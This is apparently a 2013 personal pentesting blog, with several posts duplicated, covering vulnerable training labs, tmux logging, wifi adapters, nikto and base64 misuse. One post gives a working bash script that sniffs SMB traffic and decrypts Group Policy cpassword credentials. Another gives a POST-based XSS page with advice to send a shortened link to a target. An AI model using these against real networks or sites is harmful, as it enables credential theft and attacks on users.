nerd-drool:
http://www.linusakesson.net/programming/tty/index.php
Wednesday, April 10, 2013
Monday, April 8, 2013
Learning to Hack - Vulnerable Testbeds
There are a crap ton of vulnerable testbeds to educate the interested in how applications/operatings systems get hacked. I'll update this list as I come across them:
http://vulnhub.com/
http://io.smashthestack.org:84/
https://github.com/stripe-ctf/stripe-ctf
https://github.com/stripe-ctf/stripe-ctf-2.0/
http://www.dvwa.co.uk/
http://www.offensive-security.com/metasploit-unleashed/Metasploitable
http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10
https://github.com/SpiderLabs/SQLol
https://github.com/SpiderLabs/ShelLOL
https://github.com/SpiderLabs/XMLmao
https://github.com/SpiderLabs/XSSmh
https://github.com/SpiderLabs/CryptOMG
https://www.pentesterlab.com/exercises
http://www.overthewire.org/wargames/
EDIT:
Recently found these links on reddit for Capture The Flag challenges:
https://github.com/isislab/Project-Ideas/wiki/Capture-The-Flag-Competitions
http://vulnhub.com/
http://io.smashthestack.org:84/
https://github.com/stripe-ctf/stripe-ctf
https://github.com/stripe-ctf/stripe-ctf-2.0/
http://www.dvwa.co.uk/
http://www.offensive-security.com/metasploit-unleashed/Metasploitable
http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10
https://github.com/SpiderLabs/SQLol
https://github.com/SpiderLabs/ShelLOL
https://github.com/SpiderLabs/XMLmao
https://github.com/SpiderLabs/XSSmh
https://github.com/SpiderLabs/CryptOMG
https://www.pentesterlab.com/exercises
http://www.overthewire.org/wargames/
EDIT:
Recently found these links on reddit for Capture The Flag challenges:
https://github.com/isislab/Project-Ideas/wiki/Capture-The-Flag-Competitions
Monday, March 18, 2013
Download ShmooCon 2013 Videos
ShmooCon released their videos on their website for everyone to download.
You can copy and paste that into your terminal and it will download the videos to that directory.
wget -i <(cat <<EOF
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Opening Remarks & Rants.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - How to Own a Building BacNET Attack Framework.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Mainframed The Secrets Inside that Black Box.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - WIPE THE DRIVE - Techniques for Malware Persistence.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Apple iOS Certificate Tomfoolery.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Hide and Seek, Post-Exploitation Style.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Hackers get Schooled Learning Lessons from Academia.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Friday Fire Talks.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Running a CTF - Panel on the Art of Hacker Gaming.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - C10M Defending The Internet At Scale.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Paparazzi Over IP.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - DIY Using Trust to Secure Embedded Projects.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Moloch A New And Free Way To Index Your Packet Capture Repository-1.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - OpenStack Security Brief.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Generalized Single Packet Auth for Cloud Envions.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - From Shotgun Parsers to Better Software Stacks.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - The Computer Fraud and Abuse Act Swartz, Auernheimer, and Beyond.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Malware Analysis Collaboration Automation & Training.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Bright Shiny Things Intelligent DA Control.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Strategies of a World Class Security Inciden.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Armoring Your Android Apps.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Protecting Sensitive Information on iOS Devices.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Beyond Nymwars - Online Identity Battle.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - How Smart Is BlueTooth Smart.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Chopshop Busting the Gh0st.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - The Cloud - Storms on the Horizon.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - 0wn The Con.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - PunkSPIDER Open Source Fuzzing Proj Tgting the Internet.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Crypto - Youre Doing It Wrong.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Identity Based Internet Protocol.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - NSM and more with Bro Network Monitor.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - These Go To Eleven - When the Law Goes Too Far.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Forensics - ExFat Bastardized for Cameras.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Page Fault Liberation Army or Better Security Through Trapping.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Hacking as an Act of War.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - MASTIFF - Automated Static Analysis Framewor.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Attacking SCADA Wireless Systems.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Ka-Ching - How to Make Real Money.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Is Practical Info Sharing Possible.mp4
EOF
)
You can copy and paste that into your terminal and it will download the videos to that directory.
Friday, March 8, 2013
Tmux screen logging workaround
I really like tmux, its sexy, sleek, actively developed, and has amazing mouse support. I only had one problem (so far) with the transition from GNU screen: output logging.
GNU screen has an amazing config option that I used almost all the time:
The problem is that tmux doesnt have the same option :( the closest thing I have seen is the "pipe-pane" option, but I couldnt find any way to automate that upon startup of tmux. I figured, well since tmux doesnt let me do it, maybe I can hack something together myself. And thats exactly what i did. I give to you...tmux output logging via the script command:
The above code basically checks if the $TERM variable is set to "screen" (tmux does this by default) and then check if the parent PID's name is "tmux". then it sets up a logging environment and output everything to the logfile it specifies.
That code works for OSX, for your basic GNU linux setup try this instead:
All you have to do is put that code into your .profile or .bashrc/.bash_profile and you are good to go.
Enjoy!
GNU screen has an amazing config option that I used almost all the time:
logfile screenlogs/%S%Y%m%d-%n.log
deflog onThe problem is that tmux doesnt have the same option :( the closest thing I have seen is the "pipe-pane" option, but I couldnt find any way to automate that upon startup of tmux. I figured, well since tmux doesnt let me do it, maybe I can hack something together myself. And thats exactly what i did. I give to you...tmux output logging via the script command:
if [[ $TERM = "screen" ]] && [[ $(ps $PPID -o comm=) = "tmux" ]] ; then logname="$(date '+%d.%m.%Y_%H:%M:%S').tmux.log" mkdir $HOME/logs 2> /dev/null script -t 1 $HOME/logs/${logname} bash -login exit fi
That code works for OSX, for your basic GNU linux setup try this instead:
if [[ $TERM = "screen" ]] && [[ $(ps -p $PPID -o comm=) = "tmux" ]]; then logname="$(date '+%d.%m.%Y_%H:%M:%S').tmux.log" mkdir $HOME/logs 2> /dev/null script -f $HOME/logs/${logname} exit fi
All you have to do is put that code into your .profile or .bashrc/.bash_profile and you are good to go.
Enjoy!
Sunday, March 3, 2013
Bash script to sniff, parse, and decrypt cpassword's from GPOs
parse_username(){ echo -n "$1" | grep -o -P 'runAs=".*?"'| cut -d'"' -f 2 } parse_cpassword(){ echo -n "$1" | grep -o -P 'cpassword=".*?"'| cut -d'"' -f 2 } decrypt_cpassword(){ cpassword="$1" pad_length=$(expr 4 - length "${cpassword}" % 4) # figure out the padding length padding=$(for i in {1..${pad_length}}; do printf =; done) #output correct padding string #pad, b64 decode, then decrypt the password echo $(echo -n ${cpassword}${padding} | base64 -d | openssl aes-256-cbc -d -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv '') } tshark -R 'smb.cmd==0x2e and tcp contains 'cpassword'' -Tfields -e smb.file_data \ | xxd -r -p | grep cpassword \ | while read line; do \ echo $(parse_username "$line"):$(decrypt_cpassword $(parse_cpassword "$line")); done
Figlet Fonts
These seems to be the least retarded....
univers
stop
starwars
standard
graffiti
big
figlet -f stop KITTENS
univers
stop
starwars
standard
graffiti
big
figlet -f stop KITTENS
Labels:
Just For Fun
Wednesday, February 27, 2013
The Best USB WiFi Adapter for Pentests
I've spent a couple days researching what is the best USB wifi adapter to use in wireless penetration tests/site surveys.
If you are only concerned about the 2.4ghz spectrum than the widely suggested ALFA AWUS036H is still the best and works flawlessly out of the box.
The problem arises when you are trying to encompass both 2.4 and 5ghz ranges. I'll save you the rant about my search for the right device and i'll just give it to you here:
The only Dual Band (2.4/5ghz) USB adapter that works out of the box with everything including WPS cracking (reaver) that you can currently buy is the Ubiquiti SR71 USB Adapter. It comes up as the carl9170 driver in BT5r3.
http://www.amazon.com/Ubiquiti-Networks-SR71-USB-WLAN-802-11a/dp/B004EFND3I/ref=sr_1_1?ie=UTF8&qid=1361984587&sr=8-1&keywords=sr71+usb
Hopefully this saves you the days it took me to figure out which one is the best.
NOTE:
After some extensive testing i've noticed that it sometimes has a problem with WPS cracking and can be a bit finicky with the drivers. The ALFA AWUS036H still works flawlessly. I'm going to be testing more and more devices and will report when i have something.
If you are only concerned about the 2.4ghz spectrum than the widely suggested ALFA AWUS036H is still the best and works flawlessly out of the box.
The problem arises when you are trying to encompass both 2.4 and 5ghz ranges. I'll save you the rant about my search for the right device and i'll just give it to you here:
The only Dual Band (2.4/5ghz) USB adapter that works out of the box with everything including WPS cracking (reaver) that you can currently buy is the Ubiquiti SR71 USB Adapter. It comes up as the carl9170 driver in BT5r3.
http://www.amazon.com/Ubiquiti-Networks-SR71-USB-WLAN-802-11a/dp/B004EFND3I/ref=sr_1_1?ie=UTF8&qid=1361984587&sr=8-1&keywords=sr71+usb
Hopefully this saves you the days it took me to figure out which one is the best.
NOTE:
After some extensive testing i've noticed that it sometimes has a problem with WPS cracking and can be a bit finicky with the drivers. The ALFA AWUS036H still works flawlessly. I'm going to be testing more and more devices and will report when i have something.
Monday, February 11, 2013
Exploiting POST Based XSS
Found this on the web somewhere and wanted to post it here to have a place to reference it. place the actual XSS in the "abcd" section and place it on a webserver somwhere. Bitly link the exploit code to your target and have it execute.
<body onload=”xss();”> <form method=post name=f action=”http://www.example.com/whatever.php”> <input name=”abcd” value=”<SCRIPT>alert(’XSS’)</SCRIPT>”> <input type=”submit” class=”button” name=”s”> </form> <script> function xss() { document.f.s.click(); } </script> </body>
Labels:
Web
Tuesday, February 5, 2013
Using Nmap Output in Nikto
Nikto can read/parse nmap output to supply a list of hosts and ports to scan:
nikto -h nmap_scan.gnmap
This will make nikto read the gnmap file, pull out the hostnames and port numbers and start scanning. It really handy versus manually grepping out entries to scan.
nikto -h nmap_scan.gnmap
This will make nikto read the gnmap file, pull out the hostnames and port numbers and start scanning. It really handy versus manually grepping out entries to scan.
Monday, February 4, 2013
Base64 Encoding and the Stupid Things Developers Do
Base64 encoding is everywhere. It the #1 data encoding type used on the internet. Even though it technically increases the size of the data by 33% its still used in spaces where speed is of the utmost importance.
Why?
Mainly because of two reasons. Its ubiquitous and it was meant to be used to transmit non ascii data in ascii only systems. Base64 was originally designed as a method to transmit binary information through plaintext channels such as attachments on emails. Email is still plaintext, so anything thats not plaintext needs to be represented differently or else the email servers/clients would barf upon reading it.
Where the Problem Lay:
The problem is when developers dont truly understand the concepts of encoding and mentally group it into the same category as encryption. ENCODING IS NOT ENCRYPTION and dont let anyone tell you otherwise. Changing the location of the secret base from english to spanish does not protect the location from the enemy. It's especially annoying when someone tries to back up the argument of encoding as encryption by saying something like "well if they dont speak spanish then its just as good". No, its not. Because that not security, thats obfuscation All i have to do is find someone who speaks spanish and the game is over. I used to think that if you used a encoding type nobody has ever seen before than maybe thats moving into the security category, but unfortunately its not. This is because that requires a massive underestimation of the ability of people to obsess over puzzles. Just dont do it, its really not that hard...
So, if you have sensitive information (passwords, credit cards, SSNs, keys, etc) and you only base64 encode them, then you are sending them cleartext. Every developer should consider base64 encoding as the equivalent security as plaintext, because in the end, it is.
Why?
Mainly because of two reasons. Its ubiquitous and it was meant to be used to transmit non ascii data in ascii only systems. Base64 was originally designed as a method to transmit binary information through plaintext channels such as attachments on emails. Email is still plaintext, so anything thats not plaintext needs to be represented differently or else the email servers/clients would barf upon reading it.
Where the Problem Lay:
The problem is when developers dont truly understand the concepts of encoding and mentally group it into the same category as encryption. ENCODING IS NOT ENCRYPTION and dont let anyone tell you otherwise. Changing the location of the secret base from english to spanish does not protect the location from the enemy. It's especially annoying when someone tries to back up the argument of encoding as encryption by saying something like "well if they dont speak spanish then its just as good". No, its not. Because that not security, thats obfuscation All i have to do is find someone who speaks spanish and the game is over. I used to think that if you used a encoding type nobody has ever seen before than maybe thats moving into the security category, but unfortunately its not. This is because that requires a massive underestimation of the ability of people to obsess over puzzles. Just dont do it, its really not that hard...
So, if you have sensitive information (passwords, credit cards, SSNs, keys, etc) and you only base64 encode them, then you are sending them cleartext. Every developer should consider base64 encoding as the equivalent security as plaintext, because in the end, it is.
Labels:
Web
Subscribe to:
Posts (Atom)